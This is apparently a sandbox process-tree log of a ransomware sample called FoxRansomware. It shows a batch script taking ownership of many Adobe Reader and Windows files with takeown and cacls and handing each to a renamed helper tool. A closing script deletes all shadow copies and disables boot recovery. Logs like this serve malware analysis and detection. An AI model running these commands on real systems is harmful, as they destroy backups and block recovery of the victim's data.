C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵PID:4496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Chess\ChessMCE.png" /E /G Admin:F /C3⤵PID:4708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Chess\ChessMCE.png"3⤵
- Modifies file permissions
PID:4424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ChessMCE.png" -nobanner3⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ChessMCE.png" -nobanner4⤵PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:4792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:4840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
PID:4548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:4760
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵PID:4984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner3⤵PID:4876
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "resource.xml" -nobanner4⤵PID:4852
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:5012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:4800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:4908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "license.html" -nobanner3⤵PID:4940
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "license.html" -nobanner4⤵PID:5044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:5108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:5052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:4936
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:5140
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:5172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:5036
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:4260
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_received.gif" -nobanner3⤵PID:5292
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "forms_received.gif" -nobanner4⤵PID:5304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:5880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:5316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:6676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:5456
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:6660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵
- Modifies file permissions
PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "submission_history.gif" -nobanner3⤵PID:2108
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "submission_history.gif" -nobanner4⤵PID:6188
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:5220
-
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C | PID 5648
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" | PID 5428
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "Identity-H" -nobanner | PID 5672
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "Identity-H" -nobanner | PID 5704
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5716
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"" | PID 6920
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C | PID 5656
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" | PID 5580
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-Regular.otf" -nobanner | PID 6896
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "MinionPro-Regular.otf" -nobanner | PID 868
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6996
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"" | PID 6280
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C | PID 6928
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" | PID 5380
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ZY______.PFB" -nobanner | PID 6900
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "ZY______.PFB" -nobanner | PID 7056
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5748
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"" | PID 272
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C | PID 5772
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" | PID 7016
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt32.clx" -nobanner | PID 6968
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "brt32.clx" -nobanner | PID 7060
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5636
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"" | PID 5576
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C | PID 5852
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" | PID 7100
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa.fca" -nobanner | PID 6932
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "usa.fca" -nobanner | PID 5824
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5972
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"" | PID 5940
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C | PID 2180
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" | PID 5908
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CROATIAN.TXT" -nobanner | PID 6020
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "CROATIAN.TXT" -nobanner | PID 5680
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 1780
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"" | PID 6128
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C | PID 4180
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" | PID 4776
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1251.TXT" -nobanner | PID 6796
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "CP1251.TXT" -nobanner | PID 5872
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 2992
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"" | PID 5844
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C | PID 6032
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" | PID 5412
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "background.png" -nobanner | PID 6008
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "background.png" -nobanner | PID 6000
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5948
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"" | PID 1552
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C | PID 6052
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" | PID 6240
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner | PID 6216
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "resource.xml" -nobanner | PID 7092
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6292
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"" | PID 6296
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C | PID 2464
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" | PID 6380
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "resource.xml" -nobanner | PID 7148
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "resource.xml" -nobanner | PID 6364
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 5512
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"" | PID 6236
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C | PID 5504
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" | PID 7160
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "background.png" -nobanner | PID 1892
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "background.png" -nobanner | PID 6408
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6452
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"" | PID 6324
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C | PID 6520
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" | PID 6348
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "tasks.xml" -nobanner | PID 6332
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "tasks.xml" -nobanner | PID 6560
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6384
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"" | PID 6564
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C | PID 6696
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" | PID 6668
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner | PID 6544
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "qmgr0.dat" -nobanner | PID 2068
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6588
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"" | PID 6596
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C | PID 6728
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" | PID 6716
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "RTC.der" -nobanner | PID 6744
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "RTC.der" -nobanner | PID 6636
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6816
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"" | PID 1716
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C | PID 6752
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" | PID 6832
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "end_review.gif" -nobanner | PID 6804
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "end_review.gif" -nobanner | PID 6776
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6708
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"" | PID 2376
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C | PID 2536
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" | PID 1420
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviews_joined.gif" -nobanner | PID 1220
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "reviews_joined.gif" -nobanner | PID 6888
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 6836
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"" | PID 1256
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C | PID 324
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" | PID 1304
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "server_ok.gif" -nobanner | PID 2768
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "server_ok.gif" -nobanner | PID 1380
    [3] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner | PID 604
  [2] C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"" | PID 1888
    [3] C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C | PID 808
    [3] C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" | PID 1996
        - Modifies file permissions
    [3] C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "warning.gif" -nobanner | PID 920
      [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exe | NDS5iFeg.exe -accepteula "warning.gif" -nobanner | PID 1268
[1] C:\Windows\system32\taskeng.exe | taskeng.exe {264BE37B-D881-42EF-B92D-99C535E440B9} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1] | PID 5188
  [2] C:\Windows\SYSTEM32\cmd.exe | C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\OfP7QNh1.bat" | PID 6940
    [3] C:\Windows\system32\vssadmin.exe | vssadmin Delete Shadows /All /Quiet | PID 3252
        - Interacts with shadow copies
    [3] C:\Windows\System32\Wbem\WMIC.exe | wmic SHADOWCOPY DELETE | PID 6384
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled No | PID 6500
        - Modifies boot configuration data using bcdedit
    [3] C:\Windows\system32\bcdedit.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures | PID 1336
